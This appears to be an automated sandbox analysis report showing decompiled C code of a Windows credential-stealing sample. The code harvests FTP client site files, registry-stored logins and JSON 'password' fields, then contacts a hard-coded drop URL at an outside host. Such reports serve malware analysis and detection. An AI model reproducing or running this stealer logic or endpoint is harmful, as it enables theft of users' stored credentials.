                                                                        				if( *_t30 == 0) {
                                                                        					L5:
                                                                        					_t10 = E00401DCE(_t34, 0x23);
                                                                        					_t35 = _t10;
                                                                        					if(_t10 != 0) {
                                                                        						E00404131(_a4, E00401D69(_t10, "\\3D-FTP"), "sites.ini", 0xbeef0000); // executed
                                                                        						E004017D5(_t17);
                                                                        					}
                                                                        					_t12 = E00401DCE(_t35, 0x23);
                                                                        					_t36 = _t12;
                                                                        					if(_t12 != 0) {
                                                                        						E00404131(_a4, E00401D69(_t12, "\\SiteDesigner"), "sites.ini", 0xbeef0000); // executed
                                                                        						E004017D5(_t14);
                                                                        					}
                                                                        					return E00401553(_t29, _t36, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t20 = StrStrIA(_t30, "3D-FTP");
                                                                        					_t32 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						_t24 = E0040234A(_t32, _t30);
                                                                        						if(E0040234A(_t32, _t30) != 0) {
                                                                        							E00404131(_a4, _t24, "sites.ini", 0xbeef0000);
                                                                        							E004017D5(_t24);
                                                                        						}
                                                                        					}
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        					_t34 =  *_t30;
                                                                        				} while ( *_t30 != 0);
                                                                        				goto L5;
                                                                        			}










                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,3D-FTP), ref: 0040CAE5
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                                                                        • API String ID: 1884169789-4074339522
                                                                        • Opcode ID: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
                                                                        • Instruction ID: c21e1b23b53f1c1b31708c1f6647b193aba12693f6123f211595877f46f97cb5
                                                                        • Opcode Fuzzy Hash: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
                                                                        • Instruction Fuzzy Hash: 2711C1B0A40205B9EB1137769C47FAF397E4F80754F24013B7951B55E2DA7CAE8086AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040AB27(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v20;
                                                                        				char _v2068;
                                                                        				char _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				long _t36;
                                                                        				long _t37;
                                                                        
                                                                        				_t36 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t37 = _t36;
                                                                        				if(_t37 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2076 = E00401D15(E00401D15(_a8, "\\"),  &_v2068);
                                                                        						E004017D5(_t42);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2076, "SiteServers",  &_v20);
                                                                        						__eflags = _v2072;
                                                                        						if(_v2072 == 0) {
                                                                        							L12:
                                                                        							E004017D5(_v2072);
                                                                        							E0040AB27(_a4, _v2076);
                                                                        							E004017D5(_v2076);
                                                                        							_v12 = _v12 + 1;
                                                                        							continue;
                                                                        						}
                                                                        						__eflags = _v20 - 4;
                                                                        						if(_v20 != 4) {
                                                                        							L11:
                                                                        							E004017D5(_v2072);
                                                                        							goto L12;
                                                                        						}
                                                                        						 *_t18 =  *_v2072;
                                                                        						__eflags = _v2072 - 0x3e8;
                                                                        						if(_v2072 > 0x3e8) {
                                                                        							_v2072 = 0x3e8;
                                                                        						}
                                                                        						while(1) {
                                                                        							__eflags = _v2072;
                                                                        							if(_v2072 == 0) {
                                                                        								goto L11;
                                                                        							}
                                                                        							_t21 =  &_v2072;
                                                                        							 *_t21 = _v2072 - 1;
                                                                        							__eflags =  *_t21;
                                                                        							E0040A88E( *_t21, _a4, _v2076, _v2072);
                                                                        						}
                                                                        						goto L11;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t37;
                                                                        			}













                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AB3D
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040AB71
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AC59
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A8FA
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A90D
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A920
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A933
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A946
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A959
                                                                          • Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A96C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wsprintf$CloseEnumOpen
                                                                        • String ID: SiteServers
                                                                        • API String ID: 1693054222-2402683488
                                                                        • Opcode ID: 9899356654b6a9245afdb474d23156e5eedd5c6f695110d3672d7baa3a92c592
                                                                        • Instruction ID: 47a2a2c135a91701639e8d1277b6cd8de78c57ea59644ea58835ceb1dfa6f9dd
                                                                        • Opcode Fuzzy Hash: 9899356654b6a9245afdb474d23156e5eedd5c6f695110d3672d7baa3a92c592
                                                                        • Instruction Fuzzy Hash: E831FA7190021CEBDF21AB91CC42BDDBAB9BF04304F14C0B6A244711A1DF795AE29F9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408B58(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				long _t28;
                                                                        				long _t29;
                                                                        
                                                                        				_t28 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t29 = _t28;
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t34);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "MRU", 0);
                                                                        						if(_v2072 != 0) {
                                                                        							E00403E23(_a4, _v2072, 0xbeef0001);
                                                                        						}
                                                                        						E004017D5(_v2072);
                                                                        						E00408B58(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t29;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00408B9F
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: MRU
                                                                        • API String ID: 1332880857-344939820
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040BC01(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				int _t35;
                                                                        				void* _t52;
                                                                        
                                                                        				if(_a16 == 5) {
                                                                        					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
                                                                        					if(_v12 == 1) {
                                                                        						_push(_v16);
                                                                        						_pop( *_t8);
                                                                        						_t35 = lstrcmpiA(_v20, "logins");
                                                                        						if(_t35 == 0) {
                                                                        							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
                                                                        							if(_v12 == 1) {
                                                                        								_t35 = lstrcmpA("table", _v16);
                                                                        								if(_t35 == 0) {
                                                                        									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
                                                                        									if(_v12 == 0) {
                                                                        										 *_t22 =  *_v16;
                                                                        										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
                                                                        										if(_v12 == 1) {
                                                                        											 *0x41914c = 0xffffffff;
                                                                        											 *0x419150 = 0xffffffff;
                                                                        											 *0x419154 = 0xffffffff;
                                                                        											_t35 = E0040B69A(_v16, E0040B973);
                                                                        											_v28 = 1;
                                                                        											if( *0x41914c != 0xffffffff &&  *0x419150 != 0xffffffff &&  *0x419154 != 0xffffffff) {
                                                                        												_t52 = E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BA2E); // executed
                                                                        												return _t52;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t35;
                                                                        			}

                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(00000000,logins,?), ref: 0040BC3F
                                                                        • lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BC74
                                                                          • Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmplstrcmpi
                                                                        • String ID: logins$table
                                                                        • API String ID: 3524194181-3800951466
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00401BAA(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				int** _t28;
                                                                        				long _t30;
                                                                        				char* _t33;
                                                                        				void* _t36;
                                                                        				long _t39;
                                                                        				long _t46;
                                                                        				signed int _t51;
                                                                        				char* _t53;
                                                                        
                                                                        				_t28 = _a16;
                                                                        				if(_t28 != 0) {
                                                                        					 *_t28 = 0;
                                                                        				}
                                                                        				_t53 = 0;
                                                                        				if(_a20 != 1) {
                                                                        					if(_a20 != 2) {
                                                                        						_t51 = 0;
                                                                        					} else {
                                                                        						_t51 = 0x100;
                                                                        					}
                                                                        				} else {
                                                                        					_t51 = 0x200;
                                                                        				}
                                                                        				_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed
                                                                        				if(_t30 == 0) {
                                                                        					_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
                                                                        					if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
                                                                        						_t53 = E004017EC(_v12 + 1);
                                                                        						_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed
                                                                        						if(_t46 == 0) {
                                                                        							if(_a16 != 0) {
                                                                        								_push(_v12);
                                                                        								_pop( *__eax);
                                                                        							}
                                                                        						} else {
                                                                        							E004017D5(_t53);
                                                                        							_t53 = 0;
                                                                        						}
                                                                        					}
                                                                        					RegCloseKey(_v8); // executed
                                                                        				}
                                                                        				_t33 = _t53;
                                                                        				if(_t33 != 0 || _a20 >= 2) {
                                                                        					return _t33;
                                                                        				} else {
                                                                        					_t36 = E00401BAA(_a4, _a8, _a12, _a16, _a20 + 1); // executed
                                                                        					return _t36;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401BEF
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C0A
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401C40
                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C62
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID:
                                                                        • API String ID: 1586453840-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00406DE7(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				char* _v28;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				intOrPtr* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr* _t30;
                                                                        				char* _t32;
                                                                        				void* _t38;
                                                                        				char _t40;
                                                                        				char* _t41;
                                                                        
                                                                        				_t38 = __ecx;
                                                                        				_t19 = E00401E53(_a8); // executed
                                                                        				_t20 = _t19;
                                                                        				if(_t20 != 0) {
                                                                        					_t23 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t23;
                                                                        					if(_t23 != 0) {
                                                                        						_v24 = E004017EC(_v8);
                                                                        						E00401823(_v12, _v24, _v8);
                                                                        						_t41 = _v24;
                                                                        						while(1) {
                                                                        							__eflags =  *_t41;
                                                                        							if( *_t41 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t27 = StrStrIA(_t41, "\"password\" : \"");
                                                                        							__eflags = _t27;
                                                                        							if(_t27 != 0) {
                                                                        								_t41 = _t27 + lstrlenA("\"password\" : \"");
                                                                        								_v28 = _t41;
                                                                        								_t30 = StrStrIA(_t41, "\",");
                                                                        								__eflags = _t30;
                                                                        								if(__eflags != 0) {
                                                                        									 *_t30 = 0;
                                                                        									_push( *_t30);
                                                                        									E00406D6F(_t38, __eflags, _a4, _v28);
                                                                        									_pop(_t40);
                                                                        									_t32 = _t30;
                                                                        									 *_t32 = _t40;
                                                                        									continue;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						E00401486(_a4, 0xbeef1001);
                                                                        						E004014BC(_a4, _v24, _v8);
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t23;
                                                                        				} else {
                                                                        					return _t20;
                                                                        				}
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "password" : "
                                                                        • API String ID: 0-2310853927
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004011D5(signed int __eax, signed int __edx, CHAR* _a4, intOrPtr _a8) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				void _v4108;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				int _t18;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t28 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_t14 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                        				_v8 = _t14;
                                                                        				_t15 = _t14 + 1;
                                                                        				if(_t15 != 0) {
                                                                        					while(1) {
                                                                        						_t18 = ReadFile(_v8,  &_v4108, 0x1000,  &_v12, 0); // executed
                                                                        						if(_t18 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						E0040115C( &_v4108, _t28, _a8,  &_v4108, _v12); // executed
                                                                        						if(_v12 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							CloseHandle(_v8);
                                                                        							return 1;
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        					CloseHandle(_v8);
                                                                        					return 0;
                                                                        				} else {
                                                                        					return _t15;
                                                                        				}
                                                                        				L6:
                                                                        			}











                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000,00000000,?,?,?,00000000), ref: 004011F6
                                                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000), ref: 0040121A
                                                                        • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000), ref: 00401226
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleRead
                                                                        • String ID:
                                                                        • API String ID: 1035965006-0
                                                                        • Opcode ID: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
                                                                        • Instruction ID: d891ca6dc5143c7d33845585369107a0d95fb6be188be00085997746f24086b0
                                                                        • Opcode Fuzzy Hash: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
                                                                        • Instruction Fuzzy Hash: C2018131A40108BAEF22EA61CC03FDE7679AB14349F1081B6B540F50E1F6F89BD49B98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040D330(intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v32;
                                                                        				intOrPtr* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t22;
                                                                        				void* _t26;
                                                                        
                                                                        				_t16 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts", "FTP Count",  &_v8); // executed
                                                                        				_t17 = _t16;
                                                                        				if(_t17 != 0) {
                                                                        					_push(_t17);
                                                                        					if(_v8 != 4) {
                                                                        						L9:
                                                                        						return E004017D5();
                                                                        					}
                                                                        					 *_t4 =  *_t17;
                                                                        					if(_v12 > 0x1f4) {
                                                                        						_v12 = 0x1f4;
                                                                        					}
                                                                        					while(_v12 != 0) {
                                                                        						wsprintfA( &_v32, "FTP File%d", _v12);
                                                                        						_t26 = _t26 + 0xc;
                                                                        						_t22 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts",  &_v32, 0);
                                                                        						_t23 = _t22;
                                                                        						if(_t22 != 0) {
                                                                        							E00403E4C(_a4, _t23, 0xbeef0001);
                                                                        							E004017D5(_t23);
                                                                        						}
                                                                        						_v12 = _v12 - 1;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				return _t17;
                                                                        			}











                                                                        APIs
                                                                        • wsprintfA.USER32 ref: 0040D37A
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocalwsprintf
                                                                        • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                                                        • API String ID: 988369812-376751567
                                                                        • Opcode ID: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
                                                                        • Instruction ID: 20435d818a537ba36105be44c8c75927b15d0ac77e29042cca7cc8f591fb12c9
                                                                        • Opcode Fuzzy Hash: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
                                                                        • Instruction Fuzzy Hash: 1B017C75E40108FEEF00ABD0CC42EEEBA79AB00314F108037B810B21D1D77D8A999A5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401D15(CHAR* _a4, CHAR* _a8) {
                                                                        				int _t9;
                                                                        				CHAR* _t11;
                                                                        				CHAR* _t18;
                                                                        
                                                                        				if(_a4 == 0) {
                                                                        					_a4 = 0x4140dc;
                                                                        				}
                                                                        				if(_a8 == 0) {
                                                                        					_a8 = 0x4140dc;
                                                                        				}
                                                                        				_t9 = lstrlenA(_a4);
                                                                        				_t11 = E004017EC(_t9 + lstrlenA(_a8) + 1); // executed
                                                                        				_t18 = _t11;
                                                                        				lstrcpyA(_t18, _a4);
                                                                        				lstrcatA(_t18, _a8);
                                                                        				return _t18;
                                                                        			}







                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                        • lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                        • lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                        • String ID:
                                                                        • API String ID: 2414487701-0
                                                                        • Opcode ID: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
                                                                        • Instruction ID: b07956f7e4c4c3b071cedfc2c00158bbb0f467af7b0f96d575d83a1108638678
                                                                        • Opcode Fuzzy Hash: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
                                                                        • Instruction Fuzzy Hash: 23F03075100208BFDF012FA2DC81ADE3B98AF1435CF00D52AB9151A252E7BDC9D48F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00410B60(signed int __eax, void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
                                                                        				long _v8;
                                                                        				void* _t8;
                                                                        				void* _t9;
                                                                        				int _t13;
                                                                        				signed int _t24;
                                                                        
                                                                        				_t24 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_push(0); // executed
                                                                        				L00410DD6(); // executed
                                                                        				_t8 = E00402AF8(E00410331(E0040244F(), _t24), _t24); // executed
                                                                        				_t9 = E00402B27(_t8, _t24); // executed
                                                                        				_t10 = _t9;
                                                                        				if(_t9 != 0 && E00402C05(_t10, _t24, _a4) != 0) {
                                                                        					 *0x414616 = 1;
                                                                        				}
                                                                        				 *0x417695 = E004017EC(0x101);
                                                                        				_v8 = 0x101;
                                                                        				_t13 = GetUserNameA( *0x417695,  &_v8); // executed
                                                                        				if(_t13 == 0) {
                                                                        					E004017D5( *0x417695);
                                                                        					 *0x417695 = 0; // executed
                                                                        				}
                                                                        				E00401FD8(_t24); // executed
                                                                        				return E0041038A(E00401CBA(), _t24, "Oguqcogtkec");
                                                                        			}









                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00410B6E
                                                                        • GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeNameUser
                                                                        • String ID: Oguqcogtkec
                                                                        • API String ID: 2272643758-3284314360
                                                                        • Opcode ID: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
                                                                        • Instruction ID: 4cd0992862414466d0513175d6398bc8650a8c005d487a3a8098377ca90b23e8
                                                                        • Opcode Fuzzy Hash: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
                                                                        • Instruction Fuzzy Hash: B5F08C71608508AAE740FBB7DC03BCA35A26B4035CF00803BB418A91E3DEFC99C0966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004105CE(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char* _v28;
                                                                        				char* _v32;
                                                                        				void* _t28;
                                                                        				char* _t34;
                                                                        				char* _t36;
                                                                        				char* _t39;
                                                                        				void* _t41;
                                                                        				signed int _t44;
                                                                        				char* _t45;
                                                                        
                                                                        				_t41 = __ecx;
                                                                        				_t44 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_t39 = 0; // executed
                                                                        				E00403DDB(); // executed
                                                                        				_v24 = 0;
                                                                        				_t28 = E00401000( &_v24, _t44,  &_v24);
                                                                        				if(_v24 == 0) {
                                                                        					_t28 = E00401000( &_v24, _t44,  &_v24);
                                                                        					if(_v24 == 0) {
                                                                        						_t28 = E00401000( &_v24, _t44,  &_v24);
                                                                        					}
                                                                        				}
                                                                        				_t49 = _v24;
                                                                        				if(_v24 == 0) {
                                                                        					L23:
                                                                        					E00401019(_t28, _t44, _v24);
                                                                        					return _t39;
                                                                        				}
                                                                        				_t28 = E00410598( &_v20, _t44, _t49, _v24,  &_v20); // executed
                                                                        				if(_t28 == 1) {
                                                                        					_t45 = "http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php";
                                                                        					while( *_t45 != 0) {
                                                                        						_t39 = _t39;
                                                                        						if(_t39 == 0) {
                                                                        							_v32 = 0xa;
                                                                        							while(1) {
                                                                        								_v28 = 0;
                                                                        								_t34 = E00403D77(_t45, _v24,  &_v28);
                                                                        								_t35 = _t34;
                                                                        								__eflags = _t34;
                                                                        								if(_t34 != 0) {
                                                                        									__eflags = _v28;
                                                                        									if(_v28 != 0) {
                                                                        										_t39 = _t35;
                                                                        										__eflags = _t39;
                                                                        										if(_t39 == 0) {
                                                                        											_t36 = E00401ADD(_t41, _t44, _v28);
                                                                        											_t35 = _t36;
                                                                        											__eflags = _t36;
                                                                        											if(_t36 != 0) {
                                                                        												_t39 = _t35;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								_t28 = E00401019(_t35, _t44, _v28);
                                                                        								_t39 = _t39;
                                                                        								__eflags = _t39;
                                                                        								if(_t39 != 0) {
                                                                        									break;
                                                                        								}
                                                                        								__eflags = _v32;
                                                                        								if(_v32 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								_v32 = _v32 - 1;
                                                                        								Sleep(0x1388);
                                                                        							}
                                                                        							while(1) {
                                                                        								__eflags =  *_t45;
                                                                        								if( *_t45 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								_t45 =  &(_t45[1]);
                                                                        								__eflags = _t45;
                                                                        							}
                                                                        							_t45 =  &(_t45[1]);
                                                                        							__eflags = _t45;
                                                                        							continue;
                                                                        						}
                                                                        						break;
                                                                        					}
                                                                        					_t39 = _t39;
                                                                        					if(_t39 != 0) {
                                                                        						_t28 = E0040260B("Client Hash",  &_v20, 0x10);
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00403DDB: WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0
                                                                          • Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        • Sleep.KERNEL32(00001388,00000000,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php,00000000,00000000,00000000,?,00000000), ref: 0041069A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
